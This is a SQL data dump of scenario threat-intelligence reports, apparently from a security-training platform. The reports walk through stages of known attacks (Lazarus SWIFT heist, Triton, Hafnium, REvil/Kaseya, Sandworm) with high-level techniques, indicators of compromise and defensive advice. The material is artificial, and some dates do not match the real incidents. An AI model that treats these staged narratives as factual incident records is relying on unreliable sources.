(352, 68, 809, 3, 'Backdoor Installation and Persistence Likelihood', '### Overview\nBackdoor installation has been identified, indicating efforts to maintain long-term access.\n\n### Context\n- **Backdoor Type:** Customized variant of a known Cobalt Group tool.\n- **Persistence Mechanism:** Registry key modification and scheduled task creation.\n\n### Implications\nThe backdoor facilitates lateral movement within the network.\n\n### Recommendations\n- Conduct a full network scan for similar backdoor signatures.\n- Strengthen endpoint monitoring and defenses.', '2026-01-12 22:20:16'),
(353, 68, 810, 4, 'Lateral Movement and Target Expansion', '### Overview\nLateral movement detected, suggesting expansion of the attack footprint within the network.\n\n### Context\n- **Techniques Used:** Pass-the-Hash and Remote Desktop Protocol (RDP) exploitation.\n- **New Targets:** Systems within the card processing network.\n\n### Implications\nIncreased risk of ATM software manipulation.\n\n### Recommendations\n- Isolate compromised segments.\n- Monitor for unauthorized access attempts on critical systems.', '2026-01-12 22:20:16'),
(354, 68, 811, 5, 'ATM Software Manipulation Attempt Overview', '### Overview\nAn attempt to manipulate ATM software has been detected, potentially to alter withdrawal limits or log transactions.\n\n### Context\n- **Methodology:** Direct code injection into ATM management software.\n- **Potential Objective:** Enable unauthorized cash dispensing.\n\n### Implications\nImmediate risk of physical cash loss.\n\n### Recommendations\n- Disable affected ATM systems.\n- Conduct a thorough review of software integrity.', '2026-01-12 22:20:16'),
(355, 68, 812, 6, 'Card Processing Network Breach Analysis', '### Overview\nThe breach of the card processing network has been confirmed, with attackers accessing sensitive transaction data.\n\n### Context\n- **Data Compromised:** Cardholder information and transaction logs.\n- **Exfiltration Method:** Data exfiltrated via encrypted channels.\n\n### Implications\nPotential for fraudulent transactions using exfiltrated data.\n\n### Recommendations\n- Notify affected financial institutions.\n- Enhance encryption and access controls on transaction data.', '2026-01-12 22:20:16'),
(356, 68, 813, 7, 'Money Mule Coordination and Execution', '### Overview\nEvidence of money mule coordination suggests the final phase of the heist is operational.\n\n### Context\n- **Communication Channels:** Encrypted messaging applications.\n- **Regions Targeted:** Multiple international locations.\n\n### Implications\nCoordinated cash withdrawal operations are imminent.\n\n### Recommendations\n- Liaise with law enforcement for potential arrests.\n- Monitor ATM networks for suspicious withdrawal patterns.', '2026-01-12 22:20:16'),
(357, 68, 814, 8, NULL, NULL, '2026-01-12 22:20:16'),
(358, 69, 815, 1, 'Analysis of Custom Malware Deployment', '### Overview\nFollowing the initial compromise via spear phishing, the Lazarus Group swiftly moved to deploy custom malware within the Bangladesh Bank network. This report explores the specifics of the malware used, its capabilities, and its role in the broader heist operation.\n\n### Key Findings\n- **Custom Malware Identification**: The malware was tailored to bypass the bank\'s security measures, specifically targeting systems connected to the SWIFT network.\n- **Capabilities**: Enabled covert communication with command and control servers, data exfiltration, and remote system control.\n- **Evasion Techniques**: Utilized obfuscation and polymorphic features to remain undetected by traditional antivirus solutions.\n\n### Implications\nThis stage allowed the attackers to gain a foothold within the network, setting the stage for establishing persistence and further infiltration.', '2026-01-12 22:20:52'),
(359, 69, 816, 2, 'Persistence Mechanisms Established by Lazarus Group', '### Overview\nOnce the custom malware was deployed, the Lazarus Group focused on establishing persistence within the Bangladesh Bank network. This report delves into the techniques used to maintain long-term access.\n\n### Key Findings\n- **Backdoor Creation**: Multiple backdoors were installed, providing redundant access points.\n- **Registry Manipulation**: Modified system registries to ensure malware execution upon system startup.\n- **Credential Harvesting**: Captured administrator credentials to facilitate uninterrupted access.\n\n### Implications\nEstablishing persistence allowed the attackers to operate undetected over an extended period, crucial for planning the heist\'s next phases, including lateral movement.', '2026-01-12 22:20:52'),
(360, 69, 817, 3, 'Lateral Movement to SWIFT Servers', '### Overview\nWith persistence mechanisms in place, the Lazarus Group began moving laterally within the network to reach the SWIFT servers. This report outlines the strategies deployed to achieve this objective.\n\n### Key Findings\n- **Network Scanning**: Conducted thorough scans to map the internal network topology and identify pathways to SWIFT servers.\n- **Use of Stolen Credentials**: Leveraged harvested credentials to access critical systems undetected.\n- **Privilege Escalation**: Exploited vulnerabilities to escalate privileges and gain administrator access to SWIFT servers.\n\n### Implications\nSuccessfully accessing the SWIFT servers was a critical milestone, allowing the group to manipulate financial transactions, setting the stage for the next phase involving message manipulation.', '2026-01-12 22:20:52'),
(361, 69, 818, 4, 'Manipulation of SWIFT Messages', '### Overview\nHaving gained access to the SWIFT servers, the Lazarus Group began manipulating SWIFT messages to initiate fraudulent transactions. This report examines the tactics used to alter and forge SWIFT messages.\n\n### Key Findings\n- **Message Alteration**: Modified existing SWIFT messages to redirect funds to accounts controlled by the group.\n- **Fake Transaction Creation**: Generated new, fraudulent messages mimicking legitimate transactions.\n- **Log Tampering**: Altered system logs to cover tracks and avoid detection by bank operators.\n\n### Implications\nThe manipulation of SWIFT messages was central to executing the heist, allowing the attackers to initiate unauthorized transfers totaling $951 million.', '2026-01-12 22:20:52'),
(362, 69, 819, 5, 'Exfiltration of Stolen Funds', '### Overview\nFollowing the manipulation of SWIFT messages, the Lazarus Group successfully exfiltrated the stolen funds. This report details the methods used to transfer and secure the funds outside the bank\'s control.\n\n### Key Findings\n- **Account Transfers**: Funds were initially transferred to numerous bank accounts across various countries.\n- **Use of Shell Companies**: Employed shell companies to obscure the trail and complicate traceability.\n- **Layered Transactions**: Executed multiple layered transactions to further obfuscate the money trail.\n\n### Implications\nThe successful exfiltration of funds was a critical step in the heist, enabling the group to move substantial sums undetected, paving the way for laundering operations.', '2026-01-12 22:20:52'),
(363, 69, 820, 6, 'Funds Laundered via Philippine Casinos', '### Overview\nThe final phase of the heist involved laundering the stolen funds through Philippine casinos. This report explores the techniques used to clean the money and integrate it into the legitimate financial system.\n\n### Key Findings\n- **Casino Junket Operations**: Funds were funneled through casino junket operators, exploiting regulatory gaps.\n- **High-Value Gambling**: Engaged in high-stakes gambling to convert illicit funds into gambling chips, then cash-out legitimate earnings.\n- **Complex Money Movement**: Utilized a network of agents to transfer and divide funds across multiple accounts and jurisdictions.\n\n### Implications\nLaundering the funds through casinos provided the Lazarus Group with a sophisticated method to legitimize the stolen money, effectively concluding the heist operation.', '2026-01-12 22:20:52'),
(364, 69, 821, 7, NULL, NULL, '2026-01-12 22:20:52'),
(365, 70, 822, 1, 'Analysis of Second-Stage Payload Deployment', '## Overview\nAfter the initial compromise via the CCleaner supply chain attack, the adversaries, identified as APT41, have deployed a sophisticated second-stage payload. This payload is designed to target specific high-value technology firms.\n\n## Technical Details\n- **Payload Characteristics**: The second-stage payload exhibits characteristics consistent with APT41\'s previous operations, including the use of custom backdoors and encrypted command-and-control (C2) communications.\n- **Targeted Firms**: Intelligence suggests that 40 technology firms have been specifically targeted based on their strategic value, with a focus on those involved in software development and cloud services.\n\n## Implications\nThe deployment of this payload indicates a shift from a broad compromise to targeted espionage. The attackers are likely aiming to gather sensitive information, including intellectual property and strategic business data.\n\n## Recommendations\n- **Enhanced Monitoring**: Increase monitoring of network traffic for unusual patterns that could indicate C2 communications or data exfiltration.\n- **Patch Management**: Ensure all systems are up to date with the latest security patches to mitigate vulnerabilities that could be exploited by the payload. Note that patching does not address the supply-chain vector itself: the trojanized CCleaner build must be removed and replaced from a verified-clean source, and any host that ran it should be treated as compromised until the second-stage payload has been ruled out.', '2026-01-12 22:25:20'),
(366, 70, 823, 2, 'Exfiltration Tactics and Data Breach Analysis', '## Overview\nFollowing the deployment of the second-stage payload, APT41 has initiated the exfiltration of sensitive data from the compromised networks.\n\n## Exfiltration Techniques\n- **Data Transfer Methods**: The attackers are using encrypted channels to transfer sensitive data, minimizing detection. Known methods include the use of HTTPS and VPN to obscure data flow.\n- **Data Types**: Data types targeted for exfiltration include proprietary source code, confidential emails, and internal documents related to product development.\n\n## Impact Assessment\nThe breach poses significant risks, including potential financial losses, reputational damage, and loss of competitive advantage for the affected firms.\n\n## Recommendations\n- **Incident Response**: Activate incident response teams to contain and mitigate the breach.\n- **Data Loss Prevention**: Implement data loss prevention (DLP) solutions to monitor and block unauthorized data transfers.\n- **User Education**: Conduct user training sessions to raise awareness about phishing tactics and other methods used to gain initial access.', '2026-01-12 22:25:20'),
(367, 70, 824, 3, NULL, NULL, '2026-01-12 22:25:20'),
(368, 71, 825, 1, 'Analysis of Phishing Email Initial Access', '## Report: Analysis of Initial Access via Phishing\n\n### Overview\nThe attack began with a targeted phishing email sent to a key employee at the petrochemical plant. The email included a malicious attachment disguised as a critical update from a trusted vendor.\n\n### Technical Details\n- **Email Header Analysis**: The email originated from a spoofed domain similar to the legitimate vendor.\n- **Attachment**: The attachment was a macro-laden document that, once opened, executed a script to download the Triton/TRISIS payload.\n\n### Next Steps\nFollowing the successful phishing attempt, the malware payload is expected to execute on the victim\'s machine. Monitoring for anomalous script execution or unauthorized downloads is recommended to detect this activity.', '2026-01-13 01:52:24'),
(369, 71, 826, 2, 'Execution of Malware Payload: Detailed Insights', '## Report: Execution of Malware Payload\n\n### Overview\nThe malware, once executed, dropped a payload that initiated the attack chain within the plant\'s IT infrastructure.\n\n### Technical Details\n- **Payload Analysis**: The payload was a heavily obfuscated binary designed to evade detection by standard antivirus solutions.\n- **Execution Behavior**: Upon execution, the malware established communication with a command and control (C2) server to receive further instructions.\n\n### Next Steps\nThe next phase involves the malware attempting to establish persistence within the system. Analysts should focus on identifying any backdoor installations or modifications to system startup configurations.', '2026-01-13 01:52:24'),
(370, 71, 827, 3, 'Establishing Persistence: Backdoor Installation Insights', '## Report: Establishing Persistence\n\n### Overview\nThe malware successfully established a foothold in the system by installing a backdoor, ensuring continued access to the compromised network.\n\n### Technical Details\n- **Persistence Mechanism**: The backdoor was installed as a service, configured to start automatically with the system boot.\n- **Registry Modifications**: Key registry entries were altered to maintain persistence across reboots.\n\n### Next Steps\nThe operation will now focus on lateral movement to reach the Safety Instrumented System (SIS) controllers. Network traffic and access logs should be closely monitored for unusual patterns indicative of this propagation.', '2026-01-13 01:52:24'),
(371, 71, 828, 4, 'Lateral Movement: Network Propagation to SIS Controllers', '## Report: Lateral Movement to SIS Controllers\n\n### Overview\nThe attackers initiated lateral movement within the network to target SIS controllers, critical components in maintaining plant safety.\n\n### Technical Details\n- **Network Scanning**: Tools were used to identify and map the network, focusing on systems with access to SIS controllers.\n- **Credential Harvesting**: The attackers captured administrative credentials to facilitate movement across segmented networks.\n\n### Next Steps\nThe operation is expected to progress to data exfiltration, specifically targeting system configurations and sensitive data from SIS controllers. Enhanced monitoring of outbound data flows is crucial to detect and mitigate this phase. Because the target is a safety system, analysts should also watch for unexpected engineering or programming connections to the SIS controllers: tampering with safety logic, not data theft, is the characteristic Triton/TRISIS impact, and where the controllers have a physical program/run key switch, confirm it is not left in program mode.', '2026-01-13 01:52:24'),
(372, 71, 829, 5, NULL, NULL, '2026-01-13 01:52:24'),
(373, 72, 830, 1, 'Lateral Movement Analysis Post-Phishing Attack', '### Summary\nFollowing the initial access through spear-phishing, threat actors have initiated lateral movement within the network. This has been achieved through credential dumping techniques, which indicates that the attackers already hold local administrator or SYSTEM privileges on at least one host, since reading credentials from LSASS memory requires that level of access.\n\n### Key Indicators\n- **Credential Dumping Tools Detected**: Tools such as Mimikatz and ProcDump have been identified, suggesting attempts to harvest credentials from memory.\n- **Compromised Accounts**: Several administrative accounts have shown signs of unauthorized access, potentially increasing the breadth of the attack.\n\n### Recommendations\n- **Immediate Password Resets**: Conduct a forced reset of all potentially compromised accounts, sequenced after the affected hosts are contained; resetting while the dumping tooling is still running simply hands the attackers the new credentials.\n- **Enhanced Monitoring**: Increase logging and monitoring on privileged accounts to detect further unauthorized access attempts.\n- **Network Segmentation**: Apply stricter segmentation controls to limit lateral movement capabilities of the threat actors.\n\n### Next Steps\nPrepare for potential data exfiltration attempts by monitoring outbound network traffic and securing sensitive data repositories.', '2026-01-13 01:56:44'),
(374, 72, 831, 2, 'Data Exfiltration and Encryption Alert', '### Summary\nThe attackers have progressed to data exfiltration, indicating an escalation in the attack\'s impact. This phase involves the unauthorized transfer of sensitive data outside the network, coupled with file encryption activities.\n\n### Key Indicators\n- **Unusual Data Transfers**: Significant volumes of data have been detected moving to external IP addresses not commonly associated with regular business operations.\n- **File Encryption Routines**: The presence of encrypted files and ransom notes has been confirmed, typical of Conti ransomware operations.\n\n### Recommendations\n- **Isolate Infected Systems**: Quickly isolate systems identified with encryption activity to prevent further spread.\n- **Data Loss Prevention (DLP) Measures**: Implement DLP technologies to monitor and control outbound data flows.\n- **Engage Law Enforcement**: Notify relevant authorities for assistance and to comply with legal obligations.\n\n### Next Steps\nFocus on incident response and recovery, including system restoration and reinforcement of security measures to prevent recurrence. Prepare communication plans for internal and external stakeholders regarding the breach and its implications.', '2026-01-13 01:56:44'),
(375, 72, 832, 3, NULL, NULL, '2026-01-13 01:56:44'),
(376, 73, 856, 1, 'Web Shell Deployment Detected', '### Overview\nFollowing the initial access achieved through VPN authentication bypass, our systems have detected the deployment of web shells on compromised servers.\n\n### Detailed Findings\n- **Location:** The web shells were deployed on servers linked to defense contractors.\n- **Technique:** The attackers utilized known vulnerabilities in web applications to upload malicious scripts.\n- **Indicator of Compromise (IoC):** Unusual POST requests to `/uploads/aspnet_client/system_web/`.\n\n### Recommended Actions\n- **Containment:** Immediately isolate affected servers to prevent further exploitation.\n- **Mitigation:** Implement application whitelisting to block unauthorized scripts. Note that allowlisting constrains the processes a web shell can spawn (for example a shell or script interpreter launched by the web server worker process) but does not stop the server from executing the uploaded script itself; also remove the identified shells and make the web root and upload directories non-writable by the web server account.\n\n### Next Steps\nPrepare for potential persistence mechanisms as Hafnium may attempt to maintain access through these web shells.', '2026-01-15 00:50:02'),
(377, 73, 857, 2, 'Persistence Mechanisms Established', '### Overview\nPost deployment of web shells, Hafnium has initiated multiple persistence techniques to maintain long-term access to targeted systems.\n\n### Detailed Findings\n- **Techniques Used:** Scheduled tasks and registry modifications to re-invoke the web shells upon system reboot.\n- **Persistence Indicators:** Unfamiliar tasks scheduled under `System32\\Tasks\\` with suspicious names.\n\n### Recommended Actions\n- **Investigation:** Review all scheduled tasks for legitimacy and remove any unauthorized entries.\n- **Security Enhancement:** Strengthen monitoring of task creation and registry changes.\n\n### Future Considerations\nMonitor for potential lateral movement activities as attackers may attempt to access additional systems within the network.', '2026-01-15 00:50:02'),
(378, 73, 858, 3, 'Detecting Lateral Movement', '### Overview\nLateral movement has been detected, indicating Hafnium\'s attempt to expand their foothold within the network infrastructure.\n\n### Detailed Findings\n- **Movement Path:** Attackers are leveraging compromised credentials and employing tools like WMI and PsExec to navigate between systems.\n- **Targets:** Systems with elevated privileges or sensitive data repositories.\n\n### Recommended Actions\n- **Immediate Response:** Disable compromised accounts and enforce a password reset for all sensitive accounts.\n- **Network Segmentation:** Implement stricter network segmentation to limit movement capabilities.\n\n### Lessons Learned\nUnderstanding the scope of lateral movement techniques can aid in preemptive defense strategies. Future training should focus on identifying early indicators of such activities.', '2026-01-15 00:50:02'),
(379, 73, 859, 4, NULL, NULL, '2026-01-15 00:50:02'),
(380, 74, 860, 1, 'Malicious Script Execution on Endpoint', '## Context\nFollowing the detection of suspicious network activity, further analysis identified the execution of a malicious script on multiple endpoints within the network. This script is believed to be part of the REvil\'s toolkit for infiltrating systems through the Kaseya VSA platform.\n\n## Details\n- **Script Name**: `agentupdate.exe`\n- **Execution Time**: 2023-10-15 08:45:00 UTC\n- **Endpoints Affected**: 12\n- **Indicators of Compromise (IoCs)**: Network traffic to known REvil command and control (C2) servers.\n\n## Next Steps\nInvestigate the persistence mechanisms the script might have established to maintain access.', '2026-01-15 00:50:29'),
(381, 74, 861, 2, 'Persistence Mechanism Identified', '## Context\nPost identification of the malicious script execution, analysis has revealed that the attackers have employed sophisticated persistence mechanisms to ensure continuous access to compromised systems.\n\n## Details\n- **Methods Used**:\n  - Registry Key Modification\n  - Scheduled Tasks Creation\n- **Notable Entries**:\n  - Registry Key: `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater`\n  - Scheduled Task: `Update Service - Daily`\n\n## Next Steps\nFocus efforts on monitoring unauthorized access to internal systems as attackers may attempt lateral movement.', '2026-01-15 00:50:29'),
(382, 74, 862, 3, 'Unauthorized Access to Internal Systems', '## Context\nFollowing the establishment of persistence, unauthorized attempts to access internal systems have been recorded. These attempts are consistent with lateral movement tactics typically employed by REvil.\n\n## Details\n- **Systems Targeted**: Finance Server, HR Database\n- **Successful Access**: Yes, on Finance Server\n- **Tactics Used**: Pass-the-Hash, Credential Dumping\n- **Time of Access**: 2023-10-16 02:30:00 UTC\n\n## Next Steps\nInitiate immediate measures to detect and prevent potential data exfiltration efforts.', '2026-01-15 00:50:29'),
(383, 74, 863, 4, 'Data Exfiltration Detected', '## Context\nIn the wake of unauthorized access, data exfiltration activities have been detected. The attackers are suspected of extracting sensitive information from compromised systems.\n\n## Details\n- **Data Types**: Financial records, Employee personal data\n- **Exfiltration Method**: Encrypted data packet transfer over HTTPS protocols\n- **Volume**: Approx. 2GB\n- **Destination**: External server located in Eastern Europe\n\n## Next Steps\nEngage in incident response protocols to mitigate further data loss and begin forensic analysis to assess the full scope of the breach.', '2026-01-15 00:50:29'),
(384, 74, 864, 5, NULL, NULL, '2026-01-15 00:50:29'),
(385, 75, 865, 1, 'Analysis of Initial Access: Phishing Campaign', '## Overview\nFollowing the detection of the initial access vector, a detailed analysis of the phishing campaign used by Sandworm has been conducted.\n\n### Key Findings\n- **Targeted Individuals**: The spear-phishing emails were meticulously crafted, targeting key personnel within the Ukrainian power grid sector.\n- **Email Content**: The emails contained malicious attachments disguised as official documents from trusted entities.\n- **Exploit Details**: The attached documents leveraged known vulnerabilities in outdated software versions.\n\n### Implications\nUnderstanding the intricacies of the phishing campaign provides critical insight into the social engineering tactics employed by Sandworm. This knowledge is essential for anticipating further malware deployment strategies.', '2026-01-15 00:52:49'),
(386, 75, 866, 2, 'Execution of Industroyer Malware: Technical Breakdown', '## Overview\nPost initial access, the execution phase of the Industroyer malware was set in motion.\n\n### Malware Capabilities\n- **ICS Protocols Targeted**: The malware is capable of interfacing with multiple industrial control systems (ICS), including IEC 60870-5-101, IEC 60870-5-104, and IEC 61850.\n- **Payloads**: Specialized payloads are crafted to manipulate circuit breaker operations, causing power outages.\n\n### Recommendations\nA thorough understanding of the malware\'s execution mechanisms is pivotal to devising effective countermeasures against its propagation and persistence.', '2026-01-15 00:52:49'),
(387, 75, 867, 3, 'Persistence Mechanisms: Backdoor Analysis', '## Overview\nThe establishment of persistence through backdoors is a critical phase in maintaining long-term access.\n\n### Backdoor Variants\n- **Types**: Multiple backdoor variants were identified, including SSH-based and custom protocols.\n- **Functionality**: These backdoors facilitate remote access and command execution within the compromised network.\n\n### Defensive Measures\nIdentifying and neutralizing these backdoors is crucial for preventing unauthorized access and mitigating lateral movement across the network.', '2026-01-15 00:52:49'),
(388, 75, 868, 4, 'Lateral Movement Tactics: Network Propagation Analysis', '## Overview\nLateral movement within the network allowed Sandworm to reach critical substations and ICS components.\n\n### Techniques Used\n- **Credential Harvesting**: Compromised credentials were used to navigate the network stealthily.\n- **Remote Execution**: Tools like PsExec and WMIC were employed for remote execution and system manipulation.\n\n### Mitigation Strategies\nStrengthening network segmentation and implementing robust monitoring can help identify and halt lateral movements before critical systems are compromised.', '2026-01-15 00:52:49'),
(389, 75, 869, 5, 'Data Exfiltration: Insights and Prevention', '## Overview\nData exfiltration was a pivotal step preceding the final disruptive attack on the power grid.\n\n### Data Types Exfiltrated\n- **Control System Schematics**: Detailed blueprints of the grid\'s operational infrastructure.\n- **Operational Logs**: Logs containing sensitive operational data were extracted.\n\n### Preventative Measures\nDeploying advanced anomaly detection systems can help in early identification of data exfiltration activities, thereby safeguarding critical control system data from being compromised.', '2026-01-15 00:52:49'),
(390, 75, 870, 6, NULL, NULL, '2026-01-15 00:52:49'),
(391, 76, 871, 1, 'Unauthorized Command Execution via Compromised AWS Instance', '### Overview\nFollowing the initial access through the SSRF vulnerability, the adversary **executed unauthorized commands** within the compromised AWS environment. This activity indicates an attempt to gain further control over the system.\n\n### Key Findings:\n- **Command Execution Patterns**: Evidence shows a series of commands aimed at exploring the environment and identifying further vulnerabilities.\n- **Tools Utilized**: Likely use of common penetration testing tools tailored for AWS environments.\n\n### Implications:\nThe execution of these commands suggests the adversary\'s goal to escalate privileges and explore further opportunities within the cloud infrastructure.', '2026-01-15 00:53:58'),
(392, 76, 872, 2, 'Establishing Persistence via IAM Role Exploitation', '### Overview\nAfter executing unauthorized commands, the threat actor has likely focused on establishing persistence in the compromised environment by exploiting IAM roles.\n\n### Key Findings:\n- **IAM Role Abuse**: The adversary exploited misconfigured IAM roles to gain persistent access.\n- **Credential Access**: Temporary credentials were likely extracted to ensure continued access.\n\n### Implications:\nThe establishment of persistence indicates the adversary\'s intent to maintain long-term access and potentially move laterally within the cloud environment.', '2026-01-15 00:53:58'),
(393, 76, 873, 3, 'Lateral Movement towards Sensitive Data Stores', '### Overview\nWith persistence established, the adversary has begun moving laterally within the cloud environment, targeting sensitive data stores.\n\n### Key Findings:\n- **Target Identification**: The adversary has identified and accessed several critical data stores.\n- **Movement Patterns**: Movement was characterized by systematic exploration of network paths and access points.\n\n### Implications:\nLateral movement towards sensitive data indicates preparation for data exfiltration, revealing the adversary\'s broader objectives.', '2026-01-15 00:53:58'),
(394, 76, 874, 4, 'Data Exfiltration of Critical Information', '### Overview\nThe final stage of the attack involved the exfiltration of sensitive data from the compromised environment.\n\n### Key Findings:\n- **Data Types**: Extracted data includes personally identifiable information (PII) and financial records.\n- **Exfiltration Channels**: Utilized encrypted channels to obscure data transfer activities.\n\n### Implications:\nThe successful exfiltration of data represents a significant breach of confidentiality, with potential impacts on regulatory compliance and reputational damage.', '2026-01-15 00:53:58'),
(395, 76, 875, 5, NULL, NULL, '2026-01-15 00:53:58'),
(396, 77, 876, 1, 'Analysis of Initial Access via Social Engineering', '### Context\nFollowing the **Suspicious Login Attempt Detected** alert, we have identified that the initial access was gained through carefully crafted social engineering tactics. Attackers impersonated IT staff to extract credentials from key Twitter employees.\n\n### Findings\n- **Methodology**: Phishing emails were used to direct employees to a fake login page.\n- **Targeted Accounts**: Focus was on employees with administrative privileges.\n\n### Next Steps\nMonitor for any unauthorized use of admin tools that might suggest deeper system infiltration.', '2026-01-15 00:55:54');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(397, 77, 877, 2, 'Unauthorized Use of Admin Tools: Execution Phase', '### Context\nAfter detecting the **Unauthorized Use of Admin Tools**, it appears the attackers escalated privileges to execute further actions, including access to high-profile accounts.\n\n### Findings\n- **Admin Tools Accessed**: Tools used to manage and reset account credentials.\n- **Accounts Compromised**: High-profile accounts, including public figures and companies.\n\n### Next Steps\nFocus on identifying any signs of persistence mechanisms established by the attackers to maintain access.', '2026-01-15 00:55:54'),
(398, 77, 878, 3, 'Persistence Mechanisms: Maintaining Access', '### Context\nThe **Creation of Persistent Access Channels** alert indicates that attackers have implemented mechanisms to retain access to the compromised environment.\n\n### Findings\n- **Persistence Tactics**: Creation of backup access accounts and modification of system logs to avoid detection.\n- **Security Measures Bypassed**: Attackers likely exploited unpatched vulnerabilities.\n\n### Next Steps\nInvestigate any unusual cryptocurrency transfer activity to trace the exfiltration of funds.', '2026-01-15 00:55:54'),
(399, 77, 879, 4, NULL, NULL, '2026-01-15 00:55:54'),
(400, 78, 880, 1, 'Analysis of OAuth Token Anomalies', '## Context\nFollowing the unauthorized certificate access, APT29 appears to be leveraging compromised credentials to request OAuth tokens from Microsoft 365 environments, indicating a potential cloud exploitation strategy.\n\n## Key Findings\n- **Increased Token Requests**: A surge in OAuth token requests has been observed, correlating with accounts previously flagged for suspicious activity.\n- **Targeted Accounts**: High-value accounts, particularly those with administrative privileges, seem to be the primary targets.\n\n## Next Steps\n- Investigate the source and pattern of these OAuth token requests.\n- Monitor account activity for further indicators of compromise.', '2026-01-15 00:56:34'),
(401, 78, 881, 2, 'Detection of Backdoor Installation Techniques', '## Context\nAfter the suspicious OAuth token requests, evidence suggests APT29 is establishing persistence through the installation of backdoors.\n\n## Key Findings\n- **Backdoor Variants**: Several novel backdoor variants have been detected, designed to evade common detection mechanisms.\n- **Persistence Mechanisms**: Techniques such as registry manipulation and scheduled tasks have been employed to maintain access.\n\n## Next Steps\n- Conduct a thorough forensic analysis of affected systems.\n- Develop and deploy updated detection signatures for identified backdoor variants.', '2026-01-15 00:56:34'),
(402, 78, 882, 3, 'Investigation of Lateral Movement Techniques', '## Context\nPost-backdoor installation, APT29 seems to be executing lateral movement strategies to broaden their access within the network.\n\n## Key Findings\n- **Movement Patterns**: Use of legitimate administrative tools has been observed to facilitate lateral movement while minimizing detection.\n- **Target Expansion**: Systems with sensitive data storage have been prioritized in these lateral movement activities.\n\n## Next Steps\n- Implement network segmentation to contain potential lateral movement.\n- Enhance monitoring of administrative tool usage across the environment.', '2026-01-15 00:56:34'),
(403, 78, 883, 4, 'Details of Data Exfiltration Attempt', '## Context\nFollowing the unusual lateral movement activity, there are indications of an attempted data exfiltration by APT29.\n\n## Key Findings\n- **Exfiltration Vector**: Data was primarily targeted for extraction via encrypted channels to external servers.\n- **Data Types**: Intellectual property and sensitive internal communications were among the targeted data.\n\n## Next Steps\n- Block the identified exfiltration channels and monitor for any new attempts.\n- Conduct a full audit of data access logs to assess the potential impact.', '2026-01-15 00:56:34'),
(404, 78, 884, 5, NULL, NULL, '2026-01-15 00:56:34'),
(405, 79, 885, 1, 'Phishing Campaign Execution via Slack', '### Overview\nFollowing the initial access gained through an MFA fatigue attack, the threat actors initiated a phishing campaign targeting Uber employees via Slack.\n\n### Details\n- **Objective:** The attackers aimed to harvest additional credentials and further compromise the internal network.\n- **Tactics:**\n  - Used convincing messages that mimicked Uber\'s IT department.\n  - Embedded malicious links within the messages.\n\n### Indicators of Compromise (IoCs)\n- Unusual Slack message activity originating from compromised accounts.\n- External IP addresses accessing internal Slack channels.\n\n### Recommendations\n- Conduct immediate awareness training for employees.\n- Implement stringent verification for internal communications.', '2026-01-15 00:57:25'),
(406, 79, 886, 2, 'Persistence through Credential Dumping', '### Overview\nAfter the phishing campaign, the threat actors dumped credentials from compromised hosts and reused the harvested accounts to maintain access.\n\n### Details\n- **Tools Used:** Utilized Mimikatz and other credential dumping tools.\n- **Targets:** Key personnel with elevated privileges.\n\n### Indicators of Compromise (IoCs)\n- Unauthorized access to credential stores.\n- Sudden, unexplained privilege escalations.\n\n### Recommendations\n- Regularly monitor for anomalous login attempts.\n- Enforce password changes for affected accounts.', '2026-01-15 00:57:25'),
(407, 79, 887, 3, 'Lateral Movement and Internal Reconnaissance', '### Overview\nWith persistence established, the attackers began lateral movement to identify and access critical systems.\n\n### Details\n- **Tactics:**\n  - Systematically scanned the network for vulnerabilities.\n  - Accessed privileged systems to map out security protocols.\n\n### Indicators of Compromise (IoCs)\n- Network scanning activities.\n- Access logs showing connections to sensitive systems.\n\n### Recommendations\n- Implement network segmentation to limit lateral movement.\n- Enhance monitoring for unusual internal traffic.', '2026-01-15 00:57:25'),
(408, 79, 888, 4, 'Exfiltration of HackerOne Reports', '### Overview\nThe attackers targeted Uber\'s vulnerability disclosure program, exfiltrating sensitive HackerOne reports.\n\n### Details\n- **Objective:** To gather exploit information and security weaknesses.\n- **Method:** Used compromised credentials to access and download reports.\n\n### Indicators of Compromise (IoCs)\n- Data transfers to external IPs from internal vulnerability systems.\n- Access logs showing atypical download patterns.\n\n### Recommendations\n- Conduct an audit of access logs for sensitive systems.\n- Ensure encrypted channels for internal data handling.', '2026-01-15 00:57:25'),
(409, 79, 889, 5, 'Cover Tracks via Log Tampering', '### Overview\nTo mask their activities, the attackers tampered with logs to remove traces of their movements and actions.\n\n### Details\n- **Tactics:**\n  - Altered or deleted logs from critical systems.\n  - Used scripts to automate log-cleaning processes.\n\n### Indicators of Compromise (IoCs)\n- Inconsistencies in log files.\n- Missing logs from key timeframes.\n\n### Recommendations\n- Implement immutable logging solutions.\n- Regularly backup logs to secure, offsite locations.', '2026-01-15 00:57:25'),
(410, 79, 890, 6, 'Public Disclosure and Exploitation', '### Overview\nIn the final stage, the threat actors publicly disclosed the breach, leveraging stolen data for further exploitation.\n\n### Details\n- **Actions Taken:**\n  - Released sensitive information on forums.\n  - Used the data to exploit Uber\'s brand and operations.\n\n### Implications\n- Potential reputational damage.\n- Increased risk of targeted attacks against affected individuals.\n\n### Recommendations\n- Engage with PR and legal teams to manage public response.\n- Monitor for further exploitation attempts using disclosed data.', '2026-01-15 00:57:25'),
(411, 79, 891, 7, NULL, NULL, '2026-01-15 00:57:25'),
(412, 80, 892, 1, 'Detailed Analysis of Initial Access: DevOps Engineer\'s Network Breach', '### Context\nThe suspicious login detected on the DevOps engineer\'s home network suggests a potentially targeted attack vector. The engineer\'s credentials might have been compromised through phishing or credential stuffing techniques.\n\n### Next Steps\n- **Monitor**: Increase vigilance on the engineer\'s network activity and implement multi-factor authentication (MFA) if not already active.\n- **Investigate**: Examine recent emails and messages for phishing attempts.\n- **Prepare**: Anticipate possible malicious actions following this initial access, focusing on the execution phase.', '2026-01-15 00:59:55'),
(413, 80, 893, 2, 'Execution Phase: Malicious Script Analysis', '### Context\nThe execution of a malicious script on the compromised machine indicates the attacker has transitioned from initial access to active exploitation. The script appears to have been designed to establish persistence and further compromise the system.\n\n### Insights\n- The script likely downloaded additional payloads or modified system settings to evade detection.\n- The origin of the script should be traced, possibly exploiting a known vulnerability or an unpatched system.\n\n### Next Steps\n- **Contain**: Isolate the compromised machine to prevent further lateral movement.\n- **Analyze**: Reverse-engineer the script to understand its functionality and objectives.\n- **Plan**: Prepare for potential persistence mechanisms being activated.', '2026-01-15 00:59:55'),
